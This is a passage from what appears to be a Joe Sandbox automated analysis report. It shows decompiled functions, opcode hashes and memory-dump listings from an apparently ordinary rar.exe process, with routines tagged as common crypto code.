                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7212e0b91ce8366788a96cfaa120c4d6659914195bf94df2e42b76a1e2baa177
                                                                                                            • Instruction ID: 232c367815cc1e743c9997fdffd5b6eaab2af74ca73b8b8dcf2ad231c3076755
                                                                                                            • Opcode Fuzzy Hash: 7212e0b91ce8366788a96cfaa120c4d6659914195bf94df2e42b76a1e2baa177
                                                                                                            • Instruction Fuzzy Hash: D3C115B3A181D256DB64CF29D480ABC7B91F792744F0D8135CA8BABB89DE3ED441CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B21BD4 Relevance: .3, Instructions: 314COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 35%
                                                                                                            			E00007FF67FF650B21BD4(long long __rbx, long long __rcx, long long __rsi, signed int __rbp, void* __r11, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				char _v1080;
				void* _v1088;
				signed int _v1096;
				void* __rdi;
				intOrPtr _t98;
				intOrPtr _t99;
				void* _t112;
				void* _t125;
				void* _t137;
				signed int _t159;
				intOrPtr _t182;
				void* _t196;
				signed long long _t199;
				signed long long _t200;
				signed long long _t201;
				signed long long _t202;
				signed long long _t207;
				signed long long _t208;
				long long* _t214;
				void* _t219;
				void* _t227;
				void* _t245;
				signed long long _t252;
				long long _t253;
				intOrPtr _t255;
				signed long long _t257;
				void* _t259;
				intOrPtr _t264;
				intOrPtr _t265;
				signed int _t269;
				void* _t270;
				intOrPtr* _t272;
				intOrPtr _t273;
				void* _t275;
				void* _t276;
				intOrPtr* _t278;
				intOrPtr* _t280;

				_t270 = __r11;
				_t257 = __rbp;
				_t254 = __rsi;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t199 =  *0x50b978f0; // 0x27db226282f1
				_t200 = _t199 ^ _t259 - 0x00000440;
				_v56 = _t200;
				_t98 =  *((intOrPtr*)(__rcx + 0x1c));
				_t272 = __rcx + 0x20;
				_v1088 = _t272;
				_t253 = __rcx;
				if (_t98 == 0) goto 0x50b21c6b;
				r14d = 0x4000;
				_t99 = _t98;
				_t146 =  <  ? _t99 : r14d;
				_t214 = _t200 * 0x9f0 +  *_t272;
				 *_t214 = __rcx;
				_t201 =  *((intOrPtr*)(__rcx + 0x10));
				 *((intOrPtr*)(_t214 + 0x10)) =  <  ? _t99 : r14d;
				 *((long long*)(_t214 + 8)) = _t201 + __rbp * 8;
				_t219 = _t214 + 0x18;
				E00007FF67FF650B47090(0, _t219);
				 *(_t214 + 0x830) =  *(_t214 + 0x830) & 0x00000000;
				if (0 + r14d -  *((intOrPtr*)(__rcx + 0x1c)) < 0) goto 0x50b21c22;
				goto 0x50b21c70;
				_v1088 = _t272;
				_t159 =  *(__rcx + 0x2c);
				_v1096 = _t159;
				_t28 = _t219 + 1; // 0x4002
				r15d = _t28;
				r15d =  ==  ? 1 / _t159 : r15d;
				r13d = 0;
				if (1 == 0) goto 0x50b21d15;
				_t202 = _t201 << 4;
				r13d = r13d + 1;
				_t278 =  &_v1080 + _t202;
				 *_t278 = _t202 * 0x9f0 +  *_t272;
				_t111 =  <  ? r15d : 1;
				 *((intOrPtr*)(_t278 + 8)) =  <  ? r15d : 1;
				if (1 == 1) goto 0x50b21ce8;
				if (_t159 - 2 < 0) goto 0x50b21ce8;
				_t112 = E00007FF67FF650B5B224(_t202, _t214,  *((intOrPtr*)(__rcx + 8)), E00007FF67FF650B22100, __rsi, _t278);
				goto 0x50b21d0e;
				if (_t112 == 0) goto 0x50b21d0a;
				_t245 = _t202 * 0x9f0 +  *_t278;
				E00007FF67FF650B22140(_t214, _t253, _t245, _t253, _t254);
				if (1 -  *((intOrPtr*)(_t278 + 8)) < 0) goto 0x50b21cee;
				if (0 + r15d - 1 < 0) goto 0x50b21c98;
				E00007FF67FF650B5B518( *((intOrPtr*)(_t253 + 8)));
				r8d = 0;
				r11d = 0x80;
				if (1 == 0) goto 0x50b21eb5;
				_t265 =  *_t272;
				_t182 = r8d;
				if (_t182 != 0) goto 0x50b21dac;
				asm("movups xmm0, [eax]");
				asm("movups [ecx], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ecx+0x10], xmm1");
				asm("movups xmm0, [eax+0x20]");
				asm("movups [ecx+0x20], xmm0");
				asm("movups xmm1, [eax+0x30]");
				asm("movups [ecx+0x30], xmm1");
				asm("movups xmm0, [eax+0x40]");
				asm("movups [ecx+0x40], xmm0");
				asm("movups xmm1, [eax+0x50]");
				asm("movups [ecx+0x50], xmm1");
				asm("movups xmm0, [eax+0x60]");
				asm("movups [ecx+0x60], xmm0");
				_t227 = _t265 + 0x851 + _t245 + _t270;
				asm("movups xmm1, [eax+0x70]");
				asm("movups [ecx-0x10], xmm1");
				if (_t182 != 0) goto 0x50b21d4e;
				asm("movups xmm0, [eax]");
				asm("movups [ecx], xmm0");
				 *((intOrPtr*)(_t227 + 0x10)) =  *((intOrPtr*)(_t253 + 0x30 + _t270 + 0x10));
				goto 0x50b21e14;
				asm("movups xmm0, [eax]");
				asm("movups [ecx], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ecx+0x10], xmm1");
				asm("movups xmm0, [eax+0x20]");
				asm("movups [ecx+0x20], xmm0");
				asm("movups xmm1, [eax+0x30]");
				asm("movups [ecx+0x30], xmm1");
				asm("movups xmm0, [eax+0x40]");
				asm("movups [ecx+0x40], xmm0");
				asm("movups xmm1, [eax+0x50]");
				asm("movups [ecx+0x50], xmm1");
				asm("movups xmm0, [eax+0x60]");
				asm("movups [ecx+0x60], xmm0");
				asm("movups xmm1, [eax+0x70]");
				_t207 = _t265 - 0x360 + _t245 + _t270;
				asm("movups [ecx-0x10], xmm1");
				_t269 = __rbp;
				if (_t182 != 0) goto 0x50b21db6;
				asm("movups xmm0, [eax]");
				asm("movups [ecx], xmm0");
				 *((intOrPtr*)(_t227 + _t270 + 0x10)) =  *((intOrPtr*)(_t207 + 0x10));
				 *((intOrPtr*)(_t245 + _t265 + 0x9e8)) =  *((intOrPtr*)(_t245 + _t265 - 0x9e0));
				r8d = r8d + 1;
				if (r8d - 1 < 0) goto 0x50b21d34;
				r13d = 0;
				_t208 = _t207 << 4;
				r13d = r13d + 1;
				_t280 =  &_v1080 + _t208;
				 *_t280 = _t208 * 0x9f0 +  *_t272;
				_t124 =  <  ? r15d : 1;
				 *((intOrPtr*)(_t280 + 8)) =  <  ? r15d : 1;
				if (1 == 1) goto 0x50b21e88;
				if (_v1096 - 2 < 0) goto 0x50b21e88;
				_t125 = E00007FF67FF650B5B224(_t208, _t214,  *((intOrPtr*)(_t253 + 8)), E00007FF67FF650B22640, _t254, _t280);
				goto 0x50b21eae;
				if (_t125 == 0) goto 0x50b21eaa;
				_t249 = _t208 * 0x9f0 +  *_t280;
				E00007FF67FF650B22680(_t208, _t253, _t208 * 0x9f0 +  *_t280);
				if (1 -  *((intOrPtr*)(_t280 + 8)) < 0) goto 0x50b21e8e;
				if (0 + r15d - 1 < 0) goto 0x50b21e38;
				E00007FF67FF650B5B518( *((intOrPtr*)(_t253 + 8)));
				if (1 == 0) goto 0x50b2200d;
				_v1096 = _t208;
				r13d = 1;
				_t255 =  *_t272;
				r14d = 0;
				r15d = 0;
				if ( *((intOrPtr*)(_t214 + _t255 + 0x830)) - _t280 <= 0) goto 0x50b21f54;
				_t273 =  *((intOrPtr*)(_t214 + _t255 + 0x828));
				r8d =  *((intOrPtr*)(_t273 + 4 + __rbp * 8));
				if (r8d - r14d <= 0) goto 0x50b21f16;
				r8d = r8d - r14d;
				E00007FF67FF650B470C0(_t208, _t214, _t253 + 0x1d0, _t249 +  *((intOrPtr*)(_t214 + _t255 + 0x30)), _t255, __rbp);
				r14d =  *((intOrPtr*)(_t273 + 4 + _t257 * 8));
				E00007FF67FF650B2207C(_t214, _t253);
				if ( *((intOrPtr*)(_t253 + 0x1c8)) == 0) goto 0x50b21f3f;
				if ( *((char*)(_t273 + _t257 * 8)) != 5) goto 0x50b21f3a;
				E00007FF67FF650B360E8(0, _t214,  *((intOrPtr*)(_t253 + 0x1c8)), _t249 +  *((intOrPtr*)(_t214 + _t255 + 0x30)), _t253, _t255);
				goto 0x50b21f3f;
				E00007FF67FF650B35AD0(0, _t214,  *((intOrPtr*)(_t253 + 0x1c8)), _t253, _t255, _t257, _t280, _t265, _t269, _t270);
				r15d = r15d + 1;
				if (_t257 -  *((intOrPtr*)(_t214 + _t255 + 0x830)) < 0) goto 0x50b21ee8;
				r8d =  *((intOrPtr*)(_t214 + _t255 + 0x38));
				_t196 = r14d - r8d;
				if (_t196 >= 0) goto 0x50b21f75;
				r8d = r8d - r14d;
				E00007FF67FF650B470C0(_t208, _t214, _t253 + 0x1d0, _t249 +  *((intOrPtr*)(_t214 + _t255 + 0x30)) +  *((intOrPtr*)(_t214 + _t255 + 0x30)), _t255, _t257);
				_t276 = _t275 - 1;
				if (_t196 != 0) goto 0x50b21ed2;
				_t252 = _v1096 * 0x9f0;
				_t264 =  *_v1088;
				_t81 = _t276 + 3; // 0x2
				r9d = _t81;
				_t83 = _t265 + 0x7d; // 0x7f
				r10d = _t83;
				asm("movups xmm0, [eax]");
				asm("movups [ecx], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ecx+0x10], xmm1");
				asm("movups xmm0, [eax+0x20]");
				asm("movups [ecx+0x20], xmm0");
				asm("movups xmm1, [eax+0x30]");
				asm("movups [ecx+0x30], xmm1");
				asm("movups xmm0, [eax+0x40]");
				asm("movups [ecx+0x40], xmm0");
				asm("movups xmm1, [eax+0x50]");
				asm("movups [ecx+0x50], xmm1");
				asm("movups xmm0, [eax+0x60]");
				asm("movups [ecx+0x60], xmm0");
				asm("movups xmm1, [eax+0x70]");
				asm("movups [ecx-0x10], xmm1");
				if (_t196 != 0) goto 0x50b21fa9;
				asm("movups xmm0, [eax]");
				asm("movups [ecx], xmm0");
				 *((intOrPtr*)(_t253 + 0x30 + _t269 + 0x10)) =  *((intOrPtr*)(_t252 - 0x360 + _t264 + _t269 + 0x10));
				 *((intOrPtr*)(_t253 + 0x1c4)) =  *((intOrPtr*)(_t252 + _t264 - 0x9e0));
				if ( *((intOrPtr*)(_t253 + 0x1c8)) == 0) goto 0x50b2201e;
				_t137 = E00007FF67FF650B36084(_t214 + 0x9f0,  *((intOrPtr*)(_t253 + 0x1c8)));
				 *(_t253 + 0x1c) =  *(_t253 + 0x1c) & 0x00000000;
				return E00007FF67FF650B69D10(_t137, 1 / _t159, _v56 ^ _t259 - 0x00000440);
			}










































                                                                                                            0x7ff650b21bd4
                                                                                                            0x7ff650b21bd4
                                                                                                            0x7ff650b21bd4
                                                                                                            0x7ff650b21bd4
                                                                                                            0x7ff650b21bd9
                                                                                                            0x7ff650b21bde
                                                                                                            0x7ff650b21bf3
                                                                                                            0x7ff650b21bfa
                                                                                                            0x7ff650b21bfd
                                                                                                            0x7ff650b21c05
                                                                                                            0x7ff650b21c08
                                                                                                            0x7ff650b21c0e
                                                                                                            0x7ff650b21c15
                                                                                                            0x7ff650b21c1a
                                                                                                            0x7ff650b21c1c
                                                                                                            0x7ff650b21c22
                                                                                                            0x7ff650b21c2a
                                                                                                            0x7ff650b21c36
                                                                                                            0x7ff650b21c3a
                                                                                                            0x7ff650b21c3d
                                                                                                            0x7ff650b21c41
                                                                                                            0x7ff650b21c48
                                                                                                            0x7ff650b21c4c
                                                                                                            0x7ff650b21c50
                                                                                                            0x7ff650b21c55
                                                                                                            0x7ff650b21c67
                                                                                                            0x7ff650b21c69
                                                                                                            0x7ff650b21c6b
                                                                                                            0x7ff650b21c70
                                                                                                            0x7ff650b21c77
                                                                                                            0x7ff650b21c85
                                                                                                            0x7ff650b21c85
                                                                                                            0x7ff650b21c8b
                                                                                                            0x7ff650b21c8f
                                                                                                            0x7ff650b21c96
                                                                                                            0x7ff650b21ca0
                                                                                                            0x7ff650b21ca4
                                                                                                            0x7ff650b21ca7
                                                                                                            0x7ff650b21cbe
                                                                                                            0x7ff650b21cc1
                                                                                                            0x7ff650b21cc5
                                                                                                            0x7ff650b21ccc
                                                                                                            0x7ff650b21cd1
                                                                                                            0x7ff650b21ce1
                                                                                                            0x7ff650b21ce6
                                                                                                            0x7ff650b21cec
                                                                                                            0x7ff650b21cfa
                                                                                                            0x7ff650b21cfd
                                                                                                            0x7ff650b21d08
                                                                                                            0x7ff650b21d13
                                                                                                            0x7ff650b21d19
                                                                                                            0x7ff650b21d1e
                                                                                                            0x7ff650b21d21
                                                                                                            0x7ff650b21d29
                                                                                                            0x7ff650b21d34
                                                                                                            0x7ff650b21d45
                                                                                                            0x7ff650b21d48
                                                                                                            0x7ff650b21d4e
                                                                                                            0x7ff650b21d51
                                                                                                            0x7ff650b21d54
                                                                                                            0x7ff650b21d58
                                                                                                            0x7ff650b21d5c
                                                                                                            0x7ff650b21d60
                                                                                                            0x7ff650b21d64
                                                                                                            0x7ff650b21d68
                                                                                                            0x7ff650b21d6c
                                                                                                            0x7ff650b21d70
                                                                                                            0x7ff650b21d74
                                                                                                            0x7ff650b21d78
                                                                                                            0x7ff650b21d7c
                                                                                                            0x7ff650b21d80
                                                                                                            0x7ff650b21d84
                                                                                                            0x7ff650b21d87
                                                                                                            0x7ff650b21d8e
                                                                                                            0x7ff650b21d96
                                                                                                            0x7ff650b21d98
                                                                                                            0x7ff650b21d9b
                                                                                                            0x7ff650b21da1
                                                                                                            0x7ff650b21daa
                                                                                                            0x7ff650b21db6
                                                                                                            0x7ff650b21db9
                                                                                                            0x7ff650b21dbc
                                                                                                            0x7ff650b21dc0
                                                                                                            0x7ff650b21dc4
                                                                                                            0x7ff650b21dc8
                                                                                                            0x7ff650b21dcc
                                                                                                            0x7ff650b21dd0
                                                                                                            0x7ff650b21dd4
                                                                                                            0x7ff650b21dd8
                                                                                                            0x7ff650b21ddc
                                                                                                            0x7ff650b21de0
                                                                                                            0x7ff650b21de4
                                                                                                            0x7ff650b21de8
                                                                                                            0x7ff650b21def
                                                                                                            0x7ff650b21df3
                                                                                                            0x7ff650b21df6
                                                                                                            0x7ff650b21dfa
                                                                                                            0x7ff650b21dfe
                                                                                                            0x7ff650b21e00
                                                                                                            0x7ff650b21e03
                                                                                                            0x7ff650b21e09
                                                                                                            0x7ff650b21e14
                                                                                                            0x7ff650b21e1c
                                                                                                            0x7ff650b21e29
                                                                                                            0x7ff650b21e33
                                                                                                            0x7ff650b21e40
                                                                                                            0x7ff650b21e44
                                                                                                            0x7ff650b21e47
                                                                                                            0x7ff650b21e5e
                                                                                                            0x7ff650b21e61
                                                                                                            0x7ff650b21e65
                                                                                                            0x7ff650b21e6c
                                                                                                            0x7ff650b21e71
                                                                                                            0x7ff650b21e81
                                                                                                            0x7ff650b21e86
                                                                                                            0x7ff650b21e8c
                                                                                                            0x7ff650b21e9a
                                                                                                            0x7ff650b21e9d
                                                                                                            0x7ff650b21ea8
                                                                                                            0x7ff650b21eb3
                                                                                                            0x7ff650b21eb9
                                                                                                            0x7ff650b21ec0
                                                                                                            0x7ff650b21eca
                                                                                                            0x7ff650b21ecf
                                                                                                            0x7ff650b21ed2
                                                                                                            0x7ff650b21ed6
                                                                                                            0x7ff650b21ed9
                                                                                                            0x7ff650b21ee4
                                                                                                            0x7ff650b21ee8
                                                                                                            0x7ff650b21ef0
                                                                                                            0x7ff650b21ef8
                                                                                                            0x7ff650b21f09
                                                                                                            0x7ff650b21f0c
                                                                                                            0x7ff650b21f11
                                                                                                            0x7ff650b21f19
                                                                                                            0x7ff650b21f28
                                                                                                            0x7ff650b21f31
                                                                                                            0x7ff650b21f33
                                                                                                            0x7ff650b21f38
                                                                                                            0x7ff650b21f3a
                                                                                                            0x7ff650b21f3f
                                                                                                            0x7ff650b21f4d
                                                                                                            0x7ff650b21f54
                                                                                                            0x7ff650b21f59
                                                                                                            0x7ff650b21f5c
                                                                                                            0x7ff650b21f6d
                                                                                                            0x7ff650b21f70
                                                                                                            0x7ff650b21f7c
                                                                                                            0x7ff650b21f80
                                                                                                            0x7ff650b21f86
                                                                                                            0x7ff650b21f8f
                                                                                                            0x7ff650b21f93
                                                                                                            0x7ff650b21f93
                                                                                                            0x7ff650b21f9b
                                                                                                            0x7ff650b21f9b
                                                                                                            0x7ff650b21fa9
                                                                                                            0x7ff650b21fac
                                                                                                            0x7ff650b21faf
                                                                                                            0x7ff650b21fb3
                                                                                                            0x7ff650b21fb7
                                                                                                            0x7ff650b21fbb
                                                                                                            0x7ff650b21fbf
                                                                                                            0x7ff650b21fc3
                                                                                                            0x7ff650b21fc7
                                                                                                            0x7ff650b21fcb
                                                                                                            0x7ff650b21fcf
                                                                                                            0x7ff650b21fd3
                                                                                                            0x7ff650b21fd7
                                                                                                            0x7ff650b21fdb
                                                                                                            0x7ff650b21fe2
                                                                                                            0x7ff650b21fe9
                                                                                                            0x7ff650b21ff1
                                                                                                            0x7ff650b21ff3
                                                                                                            0x7ff650b21ff6
                                                                                                            0x7ff650b21ffc
                                                                                                            0x7ff650b22007
                                                                                                            0x7ff650b22017
                                                                                                            0x7ff650b22019
                                                                                                            0x7ff650b2201e
                                                                                                            0x7ff650b22052

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1826c779e4dd7a5d3f56678b70d8851d03806802ebe61f90e870db9e03343751
                                                                                                            • Instruction ID: 473e20d21da52559f412fe133bb53367b5ff158942ad4c2fe6eaef0fdeaf2a4d
                                                                                                            • Opcode Fuzzy Hash: 1826c779e4dd7a5d3f56678b70d8851d03806802ebe61f90e870db9e03343751
                                                                                                            • Instruction Fuzzy Hash: CAE1B422E14B8697E714DF28C9412BC7360FB95B48F199635DF4EA6312EF3AE691C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B55760 Relevance: .3, Instructions: 312COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E00007FF67FF650B55760(void* __esi, void* __rax, long long __rbx, void* __rcx, signed int __rdx, void* __r9, void* __r11) {
				void* __rdi;
				void* __rsi;
				signed int _t205;
				void* _t221;
				signed int _t229;
				signed int _t240;
				void* _t275;
				signed long long _t295;
				void* _t316;
				void* _t342;
				signed long long _t343;
				void* _t345;
				signed long long _t347;
				void* _t348;
				void* _t357;
				void* _t358;
				void* _t361;
				signed int* _t364;
				void* _t366;
				intOrPtr _t367;
				signed int* _t379;
				void* _t383;

				_t366 = __r11;
				 *((long long*)(_t342 + 0x20)) = __rbx;
				_push(_t383);
				E00007FF67FF650B69CB0(0x1040, __rax, _t358, __r11);
				_t343 = _t342 - __rax;
				_t295 =  *0x50b978f0; // 0x27db226282f1
				 *(_t343 + 0x1030) = _t295 ^ _t343;
				r11d =  *(__rcx + 0x2404);
				r15d = 0;
				 *(_t343 + 0x20) = __rdx;
				_t316 = __rcx;
				dil = 1;
				if (r11d <= 0) goto 0x50b55ba9;
				r14d = r11d;
				_t345 = _t383;
				if (r13d <= 0) goto 0x50b55812;
				if (__esi == 0) goto 0x50b557fe;
				if (r15d == 0) goto 0x50b557fe;
				goto 0x50b55800;
				_t229 =  *(_t345 +  *(_t343 + 0x20)) & 0x000000ff ^ 0;
				if (_t345 + 1 - r8d < 0) goto 0x50b557d9;
				r15d = 0;
				 *(_t343 + 0x30) = _t229;
				_t205 =  ==  ? dil & 0xffffffff : r15d;
				dil = _t205;
				if (_t229 != 0) goto 0x50b557c9;
				if (_t205 != 0) goto 0x50b55ba9;
				if ( *((intOrPtr*)(__rcx + 0x2c08)) != r15b) goto 0x50b55a61;
				 *((char*)(__rcx + 0x2c08)) = 1;
				_t23 = _t316 + 0x2408; // 0x2409
				_t379 = _t23;
				if (_t366 + 1 <= 0) goto 0x50b55879;
				 *_t379 = r15d;
				if (r15d + 1 -  *(__rcx + 0x2404) + 1 < 0) goto 0x50b55864;
				_t367 =  *((intOrPtr*)(_t343 + 0x10a0));
				 *_t379 = 1;
				if (_t367 <= 0) goto 0x50b558f4;
				_t347 =  *(__rcx + 0x2404);
				if (_t347 <= 0) goto 0x50b558ec;
				_t28 = _t316 + 0x2408; // 0x2409
				_t361 = _t28;
				_t36 = _t361 + _t347 * 4 - 4; // 0x2405
				if ( *((intOrPtr*)(__rcx +  *(_t343 + 0x20) * 4 - 4)) == 0) goto 0x50b558db;
				if ( *_t36 == r15d) goto 0x50b558db;
				goto 0x50b558de;
				 *(_t361 + _t347 * 4) =  *(_t361 + _t347 * 4) ^ r15d;
				_t348 = _t347 - 1;
				if (_t348 > 0) goto 0x50b558b5;
				if (_t383 + 1 - _t367 < 0) goto 0x50b55890;
				r8d = 0xff;
				 *(__rcx + 0x2000) = r15d;
				r8d = r8d - r13d;
				if (r8d - 0x100 >= 0) goto 0x50b55a61;
				r12d = 1;
				r11d = r15d;
				if ( *(__rcx + 0x2404) + 1 <= 0) goto 0x50b5599a;
				r10d = r15d;
				if ( *((intOrPtr*)(__rcx + (r10d - (((0x80808081 * r10d >> 0x20) + r10d >> 7) + ((0x80808081 * r10d >> 0x20) + r10d >> 7 >> 0x1f)) * 0xff) * 4)) == r15d) goto 0x50b5597f;
				_t275 =  *_t379 - r15d;
				if (_t275 == 0) goto 0x50b5597f;
				goto 0x50b55982;
				r11d = r11d ^ r15d;
				r10d = r10d + r8d;
				if (_t275 != 0) goto 0x50b55935;
				if (r11d != 0) goto 0x50b55a4b;
				r10d = r12d;
				 *(__rcx + 0x1c00 +  *(__rcx + 0x2000) * 4) = r13d;
				 *(__rcx + 0x2004 +  *(__rcx + 0x2000) * 4) = r15d;
				if ( *(__rcx + 0x2404) + r12d - r12d <= 0) goto 0x50b55a44;
				r9d = r15d;
				_t73 = _t316 + 0x240c; // 0x240d
				if ( *_t73 == r15d) goto 0x50b55a1a;
				if (r9d - (((0x80808081 * r9d >> 0x20) + r9d >> 7) + ((0x80808081 * r9d >> 0x20) + r9d >> 7 >> 0x1f)) * 0xff == 0) goto 0x50b55a1a;
				goto 0x50b55a1d;
				r10d = r10d + 2;
				r9d = r9d + _t348 + _t348;
				 *(__rcx + 0x2004 +  *(__rcx + 0x2000) * 4) =  *(__rcx + 0x2004 +  *(__rcx + 0x2000) * 4) ^ r15d;
				if (r10d -  *(__rcx + 0x2404) + r12d < 0) goto 0x50b559d2;
				 *(__rcx + 0x2000) =  *(__rcx + 0x2000) + r12d;
				r8d = r8d + r12d;
				if (r8d - 0x100 < 0) goto 0x50b5591e;
				_t98 = _t316 + 0x2408; // 0x2409
				_t99 = _t343 + 0x830; // 0x831
				_t357 = _t99;
				_t100 = _t343 + 0x30; // 0x31
				E00007FF67FF650B55EBC(__rcx, __rcx, _t98,  *((intOrPtr*)(__rcx +  *(_t343 + 0x20) * 4 - 4)) - __r9,  *((intOrPtr*)(__rcx - _t343 + 0x30 + _t343 + 0x34)), _t100, _t357);
				_t240 =  *(__rcx + 0x2000);
				r8d =  *(__rcx + 0x2404);
				if (_t240 - r8d > 0) goto 0x50b55ba2;
				if (_t240 <= 0) goto 0x50b55ba2;
				_t104 = _t316 + 0x2004; // 0x2005
				_t364 = _t104;
				r15d =  *(_t364 - 0x404);
				r9d = 0xff;
				r9d = r9d - r15d;
				r11d = 0;
				if (r8d <= 0) goto 0x50b55b2c;
				_t106 = _t343 + 0x830; // 0x831
				if ( *_t106 == 0) goto 0x50b55b1a;
				if (0xfffffffe8bbe5d5a == 0) goto 0x50b55b1a;
				goto 0x50b55b1c;
				r11d = r11d ^ 0;
				if (0xfffffffe8bbe5d5a != 0) goto 0x50b55ad4;
				r9d = r13d;
				r9d = r9d - r15d;
				_t221 = _t357 - 1;
				if (_t221 < 0) goto 0x50b55b8b;
				if (_t221 - r13d >= 0) goto 0x50b55b8b;
				if (r11d == 0) goto 0x50b55b7b;
				if ( *((intOrPtr*)(__rcx + (0xff -  *((intOrPtr*)(__rcx + 0x800 +  *_t364 * 4))) * 4)) == 0) goto 0x50b55b7b;
				goto 0x50b55b7d;
				 *(r9d +  *(_t343 + 0x20) - 1) =  *(r9d +  *(_t343 + 0x20) - 1) ^ 0;
				r8d =  *(__rcx + 0x2404);
				if (r15d + 1 -  *(__rcx + 0x2000) < 0) goto 0x50b55aaf;
				goto 0x50b55bab;
				return E00007FF67FF650B69D10(1,  *(__rcx + 0x2000),  *(_t343 + 0x1030) ^ _t343);
			}

























                                                                                                            0x7ff650b55760
                                                                                                            0x7ff650b55760
                                                                                                            0x7ff650b5576e
                                                                                                            0x7ff650b55775
                                                                                                            0x7ff650b5577a
                                                                                                            0x7ff650b5577d
                                                                                                            0x7ff650b55787
                                                                                                            0x7ff650b5578f
                                                                                                            0x7ff650b55796
                                                                                                            0x7ff650b5579f
                                                                                                            0x7ff650b557a7
                                                                                                            0x7ff650b557aa
                                                                                                            0x7ff650b557b0
                                                                                                            0x7ff650b557c6
                                                                                                            0x7ff650b557cc
                                                                                                            0x7ff650b557d2
                                                                                                            0x7ff650b557db
                                                                                                            0x7ff650b557df
                                                                                                            0x7ff650b557fc
                                                                                                            0x7ff650b55808
                                                                                                            0x7ff650b5580d
                                                                                                            0x7ff650b5580f
                                                                                                            0x7ff650b5581b
                                                                                                            0x7ff650b5581e
                                                                                                            0x7ff650b5582a
                                                                                                            0x7ff650b55831
                                                                                                            0x7ff650b55835
                                                                                                            0x7ff650b55842
                                                                                                            0x7ff650b5584c
                                                                                                            0x7ff650b55853
                                                                                                            0x7ff650b55853
                                                                                                            0x7ff650b5585f
                                                                                                            0x7ff650b55864
                                                                                                            0x7ff650b55877
                                                                                                            0x7ff650b55879
                                                                                                            0x7ff650b55881
                                                                                                            0x7ff650b5588b
                                                                                                            0x7ff650b55890
                                                                                                            0x7ff650b5589a
                                                                                                            0x7ff650b5589f
                                                                                                            0x7ff650b5589f
                                                                                                            0x7ff650b558b5
                                                                                                            0x7ff650b558bc
                                                                                                            0x7ff650b558c1
                                                                                                            0x7ff650b558d9
                                                                                                            0x7ff650b558de
                                                                                                            0x7ff650b558e1
                                                                                                            0x7ff650b558ea
                                                                                                            0x7ff650b558f2
                                                                                                            0x7ff650b558f4
                                                                                                            0x7ff650b558fa
                                                                                                            0x7ff650b55901
                                                                                                            0x7ff650b5590b
                                                                                                            0x7ff650b55918
                                                                                                            0x7ff650b55924
                                                                                                            0x7ff650b5592b
                                                                                                            0x7ff650b5592d
                                                                                                            0x7ff650b5595c
                                                                                                            0x7ff650b5595e
                                                                                                            0x7ff650b55961
                                                                                                            0x7ff650b5597d
                                                                                                            0x7ff650b55982
                                                                                                            0x7ff650b55985
                                                                                                            0x7ff650b5598f
                                                                                                            0x7ff650b55994
                                                                                                            0x7ff650b559a1
                                                                                                            0x7ff650b559a4
                                                                                                            0x7ff650b559b2
                                                                                                            0x7ff650b559c6
                                                                                                            0x7ff650b559c8
                                                                                                            0x7ff650b559cb
                                                                                                            0x7ff650b559fc
                                                                                                            0x7ff650b55a00
                                                                                                            0x7ff650b55a18
                                                                                                            0x7ff650b55a24
                                                                                                            0x7ff650b55a28
                                                                                                            0x7ff650b55a2f
                                                                                                            0x7ff650b55a42
                                                                                                            0x7ff650b55a44
                                                                                                            0x7ff650b55a4b
                                                                                                            0x7ff650b55a5b
                                                                                                            0x7ff650b55a61
                                                                                                            0x7ff650b55a6b
                                                                                                            0x7ff650b55a6b
                                                                                                            0x7ff650b55a73
                                                                                                            0x7ff650b55a78
                                                                                                            0x7ff650b55a7d
                                                                                                            0x7ff650b55a85
                                                                                                            0x7ff650b55a92
                                                                                                            0x7ff650b55a9a
                                                                                                            0x7ff650b55aa5
                                                                                                            0x7ff650b55aa5
                                                                                                            0x7ff650b55aaf
                                                                                                            0x7ff650b55ab6
                                                                                                            0x7ff650b55abc
                                                                                                            0x7ff650b55abf
                                                                                                            0x7ff650b55ac5
